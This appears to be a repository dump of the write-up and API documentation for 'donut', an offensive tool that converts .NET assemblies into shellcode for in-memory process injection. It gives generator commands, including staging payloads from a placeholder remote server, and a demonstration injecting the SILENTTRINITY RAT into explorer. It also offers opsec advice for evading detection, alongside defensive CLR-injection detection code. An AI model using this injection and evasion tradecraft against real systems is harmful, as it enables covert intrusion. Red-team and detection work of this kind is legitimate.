77 | One of the things it can do is manually load .NET Assemblies into arbitrary [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains). It can do this either from disk or from memory. We utilize its capability for loading from memory to load your payload without touching disk. | |
78 | ||
79 | To see a standalone example of an Unmanaged CLR Hosting Assembly loader, check out Casey Smith's repo: [AssemblyLoader](https://github.com/caseysmithrc/AssemblyLoader) | |
80 | ||
81 | ## CLR Injection | |
82 | ||
83 | The first action that donut's shellcode takes is to load the CLR. Unless the user specifies the exact runtime version to use, v4.0.30319 of the CLR will be used by default, which supports the versions 4.0+ of .NET. If the attempt to load a specific version fails, then donut will attempt to use whichever one is avialable on the system. Once the CLR is loaded, the shellcode creates a new Application Domain. At this point, the .NET Assembly payload must be obtained. If the user provided a staging URL, then the Assembly is downloaded from it. Otherwise, it is obtained from memory. Either way, it will loaded into the new AppDomain. After the Assembly is loaded but before it is run, the decrypted copy will be released and later freed from memory with VirtualFree to deter memory scanners. Finally, the Entry Point specified by the user will be invoked along with any provided parameters. | |
84 | ||
85 | If the CLR is already loaded into the host process, then donut's shellcode will still work. The .NET Assembly will just be loaded into a new Application Domain within the managed process. .NET is designed to allow for .NET Assemblies built for multiple versions of .NET to run simultaneously in the same process. As such, your payload should always run no matter the process's state before injection. | |
86 | ||
87 | ## Shellcode Generation | |
88 | ||
89 | The logic above describes how the shellcode generated by donut works. That logic is defined in payload.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in payload.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
90 | ||
91 | # Using Donut | |
92 | ||
93 | Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Both a Windows EXE and a Python (Python planned for v1.0) script are provided for payload generation. The command-line syntax is as described below. | |
94 | ||
95 | ``` | |
96 | usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method> | |
97 | ||
98 | -f <path> .NET assembly to embed in PIC and DLL. | |
99 | -u <URL> HTTP server hosting the .NET assembly. | |
100 | -c <namespace.class> The assembly class name. | |
101 | -m <method> The assembly method name. | |
102 | -p <arg1,arg2...> Optional parameters for method, separated by comma or semi-colon. | |
103 | -a <arch> Target architecture : 1=x86, 2=amd64(default). | |
104 | -r <version> CLR runtime version. v4.0.30319 is used by default. | |
105 | -d <name> AppDomain name to create for assembly. Randomly generated by default. | |
106 | ||
107 | examples: | |
108 | ||
109 | donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll | |
110 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/ | |
111 | ``` | |
112 | ||
113 | ## Generating Shellcode | |
114 | ||
115 | To generate shellcode with donut, you must specify a .NET Assembly, an Entry Point, and any parameters that you wish to use. If your Assembly uses the *Test* namespace and includes the *Program* class with the *Main* method, then you would use the following options: | |
116 | ||
117 | ``` | |
118 | donut.exe -f Test.exe -c Test.Program -m Main | |
119 | ``` | |
120 | ||
121 | To generate the same shellcode for 32-bit processes, use the '-a' option: | |
122 | ||
123 | ``` | |
124 | donut.exe -a 1 -f Test.exe -c Test.Program -m Main | |
125 | ``` | |
126 | ||
127 | You may also provide parameters to whatever Entry Point you specify. The max length of each parameter is currently 32 characters. To demonstrate this functionality, you may use the following options and our example Assembly to create shellcode that will spawn a Notepad process and a Calc process: | |
128 | ||
129 | ``` | |
130 | .\donut.exe -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
131 | ``` | |
132 | ||
133 | When generating shellcode to run an an older Windows machine, you may need it to use v2 of the CLR, rather than v4. v2 works for versions of the .NET Framework <= 3.5, while v4 works for versions >= 4.0. By default, donut uses version 4 of the CLR. You may tell it to use v2 with the '-r' option and specifying "v2.0.50727" as the parameter. | |
134 | ||
135 | ``` | |
136 | .\donut.exe -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
137 | ``` | |
138 | ||
139 | The name of the AppDomain for your .NET payload may be specified manually using the '-d' option. By default, it will be randomly generated. You may specify a name. | |
140 | ||
141 | ``` | |
142 | .\donut.exe -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
143 | ``` | |
144 | ||
145 | In order to reduce the size of your shellcode (or for many other reasons), you may specify a URL where your payload will be hosted. Donut will produce an encrypted Donut Module with a random name that you should place at the URI you specified. The name and location where you should place it will be printed to your screen when you generate the shellcode. | |
146 | ||
147 | ``` | |
148 | .\donut.exe -u http://remote_server.com/modules/ -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe | |
149 | ``` | |
150 | ||
151 | ## Demonstrating with SILENTTRINITY | |
152 | ||
153 | For a demonstration, we will use the [SILENTTRINITY RAT](https://github.com/byt3bl33d3r/SILENTTRINITY "SILENTTRINITY") as a test payload. Since it is the most... ahh... complicated .NET Assembly that I could find, I used it for all of my testing. You may use any standard shellcode injection technique to inject the .NET Assembly. The DonutTest subproject is provided in the repo as an example injector. You may combine it with the DemoCreateProcess subproject to test the shellcode generator. In our case, we will first use DonutTest to inject into explorer. We also show what it looks like to use an existing implant to perform further injection using the ``` boo/shellcode ``` and ``` ipy/execute-assembly ``` post-exploitation modules. | |
154 | ||
155 | ### Generation | |
156 | ||
157 | First, we will generate a x64 PIC using the SILENTTRINITY DLL. Using PowerShell, we will base64-encode the result and pipe it to our clipboard. | |
158 | ||
159 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy.png) | |
160 | ||
161 | Because we don't know what processes will be available to inject into on-target, we will also generate a x86 PIC just in case we need it. | |
162 | ||
163 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy_86.png) | |
164 | ||
165 | If you wanted to, you could use a staging server by providing the URL and copying the Donut Module to the specified location. | |
166 | ||
167 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/generate_URL.png) | |
168 | ||
169 | ### Choosing a Host Process | |
170 | ||
171 | Use ProcessManager, a sub-project provided in the donut repo, to enumerate processes. ProcessManager enumerates all running processes and makes a best effort to obtain information about them. It is specifically designed to aid in determining what process to inject / migrate into. The picture below demonstrates its general usage. | |
172 | ||
173 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ProcessManager.jpg) | |
174 | ||
175 | ### Injecting | |
176 | ||
177 | First, we will use DonutTest to inject into explorer using DonutTest. | |
178 | ||
179 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_inject.jpg) | |
180 | ||
181 | As you can see, the injection was successfull: | |
182 | ||
183 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_success.png) | |
184 | ||
185 | Now assume we already have an agent running on the machine. We can use SILENTTRINITY's post-exploitation modules to inject implants into running processes. | |
186 | ||
187 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_through_agent.png) | |
188 | ||
189 | ||
190 | ## Using as a Library | |
191 | ||
192 | donut is provided as both dynamic and static libraries for both (*.a* / *.so*) and Windows (*.lib* / *.dll*). It has a simple API that is described in *docs\api.html*. Two exported functions are provided, ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` . | |
193 | ||
194 | ## Rebuilding the shellcode | |
195 | ||
196 | You may easily customize our shellcode to fit your use case. *payload.c* contains the .NET assembly loader, which should successfully compile with both Microsoft Visual Studio and mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever *payload.c* has been changed, recompiling for all architectures is recommended before rebuilding donut. | |
197 | ||
198 | ### Microsoft Visual Studio | |
199 | ||
200 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
201 | ||
202 | ``` | |
203 | nmake clean -f Makefile.msvc | |
204 | nmake -f Makefile.msvc | |
205 | ``` | |
206 | ||
207 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
208 | ||
209 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
210 | ||
211 | ``` | |
212 | nmake clean -f Makefile.msvc | |
213 | nmake x86 -f Makefile.msvc | |
214 | ``` | |
215 | ||
216 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
217 | ||
218 | ### Mingw-w64 | |
219 | ||
220 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
221 | ||
222 | ``` | |
223 | make clean -f Makefile.mingw | |
224 | make -f Makefile.mingw | |
225 | ``` | |
226 | ||
227 | Once you've recompiled for all architectures, you may rebuild donut. | |
228 | ||
229 | ## Integrating into Tooling | |
230 | ||
231 | We hope that donut (or something inspired by it) will be integrated into tooling to provide **inject** and **migrate** functionality. To do so, we suggest one of the following methods: | |
232 | ||
233 | * As an operator, using the generator to manually generate shellcode. | |
234 | * Generate the shellcode dynamically on your C2 server, pass that down to an existing implant, and inject it into another process. | |
235 | * Use our dynamic or static libraries. | |
236 | * As a template for building your own shellcode / generator. | |
237 | * Use our Python (Python planned for v1.0) extension to script shellcode generation dynamically. | |
238 | ||
239 | # Advancing Tradecraft | |
240 | ||
241 | It is our hope that releasing donut to the public will advance offensive and red team tradecraft in several ways: | |
242 | ||
243 | * Provide red teams and adversary emulators with a means to emulate this technique that threat actors may have developed in secret. | |
244 | * Provide blue teams a frame of refernce for detecting and mitigating CLR Injection techniques. | |
245 | * Inspire tool developers to develop new types of techniques and tradecraft. | |
246 | ||
247 | ## Alternative Payloads | |
248 | ||
249 | The main benefit of using .NET Assemblies as shellcode is that they can now be executed by anything that can execute shellcode on Windows. There are many more ways to inject shellcode than there are to load Assemblies. As such, offensive tool designers no longer need to design their payloads around running .NET. Instead, they may leverage their existing payloads and techniques that use shellcode. | |
250 | ||
251 | ## Injecting .NET At Will / Migration | |
252 | ||
253 | Donut will also allow the developers of C2 Frameworks / RATs to add migrate-like functionality to their tools. By using Donut as a library (or calling the generator) on the server and then providing the result to an existing agent, it may inject a new instance of itself into another running process. This may also be used to inject arbitrary post-exploitation modules so long as I/O is properly redirected. | |
254 | ||
255 | ## Disposable AppDomains | |
256 | ||
257 | When donut loads an Assembly, it loads it into a new AppDomain. Unless the user specifies the name of the AppDomain with the '-d' parameter, the AppDomain is given a random name. We specifically designed donut to run payloads in new AppDomains rather than using DefaultDomain. If this does not suit you, you can easily modify payload.c to use the default domain. By running the payload in its own AppDomain, this allows for the development of tools that run post-exploitation modules in disposable AppDomains. Application Domains can be unloaded, but individual Assemblies cannot. Therefore, to unload an Assembly when you are done with it, you must put it into its own AppDomain and unload that instead. A C# agent can have the shellcode generated on its server, inject the result into itself in a new thread, wait for the Assembly to finish executing, then unload the host AppDomain. You could also modify the shellcode itself to perform that role. | |
258 | ||
259 | ## Detecting CLR Injection | |
260 | ||
261 | One of the companion projects for donut is ModuleMonitor. It uses WMI Event Win32_ModuleLoadTrace to monitor for module loading. It provides filters, detailed data, and has an option to monitor for CLR Injection attacks. | |
262 | ||
263 | The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it. | |
264 | ||
265 | While useful, there are both false positives and false negatives: | |
266 | ||
267 | * False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR. | |
268 | * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes. | |
269 | ||
270 | Please Note: This is intended **only** as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. | |
271 | ||
272 | I am not a defender, but the following pseudocode is my attempt at an analytic that follows this logic. The DLLs that are associated with the CLR all start with "msco", such as "mscorlib.dll" and "mscoree.dll". As such, we watch for their loading, then check if the program that loaded them is a valid .NET Assembly. | |
273 | ||
274 | ``` | |
275 | void CLR_Injection: | |
276 | WHEN Image_Load event: | |
277 | if event.Module.Name contains "msco*.dll": | |
278 | if !(IsValidAssembly(event.Process.FilePath)): | |
279 | { | |
280 | print "A CLR has been injected into " + event.Process.Id | |
281 | } | |
282 | ``` | |
283 | ||
284 | The snippet below represents my implementation of this logic in C#. The full code can be found in ModuleMonitor. | |
285 | ||
286 | ```csharp | |
287 | //CLR Sentry | |
288 | //Author: TheWover | |
289 | while (true) | |
290 | { | |
291 | //Get the module load. | |
292 | Win32_ModuleLoadTrace trace = GetNextModuleLoad(); | |
293 | ||
294 | //Split the file path into parts delimited by a '\' | |
295 | string[] parts = trace.FileName.Split('\\'); | |
296 | ||
297 | //Check whether it is a .NET Runtime DLL | |
298 | if (parts[parts.Length - 1].Contains("msco")) | |
299 | { | |
300 | //Get a | |
301 | Process proc = Process.GetProcessById((int) trace.ProcessID); | |
302 | ||
303 | //Check if the file is a .NET Assembly | |
304 | if (!IsValidAssembly(proc.StartInfo.FileName)) | |
305 | { | |
306 | //If it is not, then the CLR has been injected. | |
307 | Console.WriteLine(); | |
308 | ||
309 | Console.WriteLine("[!] CLR Injection has been detected!"); | |
310 | ||
311 | //Display information from the event | |
312 | Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID); | |
313 | } | |
314 | } | |
315 | } | |
316 | ``` | |
317 | ||
318 | ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/detected.png) | |
319 | ||
320 | It is important to note that this behaviour represents all CLR Injection techniques, of which there are several. This detection should work for donut, as well as other tools such as Cobalt Strike's 'execute-assembly' command. | |
321 | ||
322 | ## OpSec Considerations | |
323 | ||
324 | ModuleMonitor demonstrates an important point about CLR Injection: When performed against unmanaged processes, CLR Injection produces highly anomalous process behavior. The loading of a CLR after a process's initial execution or from unmanaged code is unusual. There are few legitimate use cases. From a defender's perspective, this allows you to build a analytics that monitor for the behavior described in the section above. | |
325 | ||
326 | However, as I mentioned, this analytic fails to detect CLR Injection into processes that already have the CLR loaded. As such, an operator could evade the analytic by simply injecting into processes that are already managed. I would recommend the following standard operating procedure: | |
327 | ||
328 | 1. Run ProcessManager from memory to enumerate processes. Take note of which you can inject into. | |
329 | 2. If there are any processes that are already managed, then consider them the set of potential targets. | |
330 | 3. If there are not any managed processes, then all processes are potential targets. | |
331 | 4. Either way, inject / migrate into the process that is most likely to naturally produce network traffic and live the longest. | |
332 | ||
333 | # Conclusion | |
334 | ||
335 | Offensive .NET tradecraft is faced with several important challenges. One of them is the lack of means to inject into remote processes at will. While this can normally be performed with shellcode, there is no way to produce shellcode that can run a .NET Assembly directly on hardware. Any shellcode that runs a .NET Assembly must first bootstrap the Common Language Runtime and load the Assembly through it. Enter Donut. With Donut, we now have a framework for generating flexible shellcode that loads a .NET Assembly from memory. This can be combined with existing techniques and tooling to advance tradecraft in a number of ways. Hopefully, this will break down the current barriers in .NET-based exploitation and provide tool designers with a foundation for crafting more excellent tools. |
0 | ||
1 | <html> | |
2 | <body> | |
3 | ||
4 | <h3>API</h3> | |
5 | ||
6 | <ul> | |
7 | <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li> | |
8 | <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li> | |
9 | </ul> | |
10 | ||
11 | <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p> | |
12 | ||
13 | <ol> | |
14 | <li>An encrypted <var>Instance</var></li> | |
15 | <li>An encrypted <var>Module</var></li> | |
16 | <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li> | |
17 | </ol> | |
18 | ||
19 | <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p> | |
20 | ||
21 | <h3>Configuration</h3> | |
22 | ||
23 | <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p> | |
24 | ||
25 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span> | |
26 | <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span> | |
27 | <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span> | |
28 | <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span> | |
29 | <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span> | |
30 | <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span> | |
31 | <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span> | |
32 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span> | |
33 | <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span> | |
34 | <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span> | |
35 | ||
36 | <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span> | |
37 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span> | |
38 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span> | |
39 | ||
40 | <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span> | |
41 | uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span> | |
42 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span> | |
43 | ||
44 | uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span> | |
45 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span> | |
46 | <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span> | |
47 | </pre> | |
48 | ||
49 | <table border="1"> | |
50 | <tr> | |
51 | <th>Member</th> | |
52 | <th>Description</th> | |
53 | </tr> | |
54 | <tr> | |
55 | <td><code>arch</code></td> | |
56 | <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td> | |
57 | </tr> | |
58 | <tr> | |
59 | <td><code>domain</code></td> | |
60 | <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td> | |
61 | </tr> | |
62 | <tr> | |
63 | <td><code>cls</code></td> | |
64 | <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td> | |
65 | </tr> | |
66 | <tr> | |
67 | <td><code>method</code></td> | |
68 | <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td> | |
69 | </tr> | |
70 | <tr> | |
71 | <td><code>param</code></td> | |
72 | <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td> | |
73 | </tr> | |
74 | <tr> | |
75 | <td><code>file</code></td> | |
76 | <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td> | |
77 | </tr> | |
78 | <tr> | |
79 | <td><code>url</code></td> | |
80 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td> | |
81 | </tr> | |
82 | <tr> | |
83 | <td><code>runtime</code></td> | |
84 | <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td> | |
85 | </tr> | |
86 | <tr> | |
87 | <td><code>modname</code></td> | |
88 | <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td> | |
89 | </tr> | |
90 | <tr> | |
91 | <td><code>mod_type</code></td> | |
92 | <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td> | |
93 | </tr> | |
94 | <tr> | |
95 | <td><code>mod_len</code></td> | |
96 | <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td> | |
97 | </tr> | |
98 | <tr> | |
99 | <td><code>mod</code></td> | |
100 | <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td> | |
101 | </tr> | |
102 | <tr> | |
103 | <td><code>inst_type</code></td> | |
104 | <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td> | |
105 | </tr> | |
106 | <tr> | |
107 | <td><code>inst_len</code></td> | |
108 | <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td> | |
109 | </tr> | |
110 | <tr> | |
111 | <td><code>inst</code></td> | |
112 | <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td> | |
113 | </tr> | |
114 | <tr> | |
115 | <td><code>pic_len</code></td> | |
116 | <td>The size of data pointed to by <code>pic</code>.</td> | |
117 | </tr> | |
118 | <tr> | |
119 | <td><code>pic</code></td> | |
120 | <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td> | |
121 | </tr> | |
122 | </table> | |
123 | ||
124 | <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p> | |
125 | ||
126 | <h3>Instance</h3> | |
127 | ||
128 | <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p> | |
129 | ||
130 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span> | |
131 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span> | |
132 | uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span> | |
133 | DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span> | |
134 | ||
135 | uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span> | |
136 | ||
137 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
138 | uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span> | |
139 | <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span> | |
140 | <span style='color:#696969; '>// include prototypes only if header included from payload.h</span> | |
141 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span> | |
142 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
143 | <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span> | |
144 | LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span> | |
145 | GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span> | |
146 | GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span> | |
147 | VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span> | |
148 | VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span> | |
149 | VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span> | |
150 | VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span> | |
151 | Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span> | |
152 | MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span> | |
153 | GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span> | |
154 | ||
155 | <span style='color:#696969; '>// imports from oleaut32.dll</span> | |
156 | SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span> | |
157 | SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span> | |
158 | SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span> | |
159 | SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span> | |
160 | SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span> | |
161 | SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span> | |
162 | SysAllocString_t SysAllocString<span style='color:#800080; '>;</span> | |
163 | SysFreeString_t SysFreeString<span style='color:#800080; '>;</span> | |
164 | LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span> | |
165 | ||
166 | <span style='color:#696969; '>// imports from wininet.dll</span> | |
167 | InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span> | |
168 | InternetOpen_t InternetOpen<span style='color:#800080; '>;</span> | |
169 | InternetConnect_t InternetConnect<span style='color:#800080; '>;</span> | |
170 | InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span> | |
171 | InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span> | |
172 | InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span> | |
173 | HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span> | |
174 | HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span> | |
175 | HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span> | |
176 | ||
177 | <span style='color:#696969; '>// imports from mscoree.dll</span> | |
178 | CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span> | |
179 | CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span> | |
180 | ||
181 | <span style='color:#696969; '>// imports from ole32.dll</span> | |
182 | CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span> | |
183 | CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span> | |
184 | CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span> | |
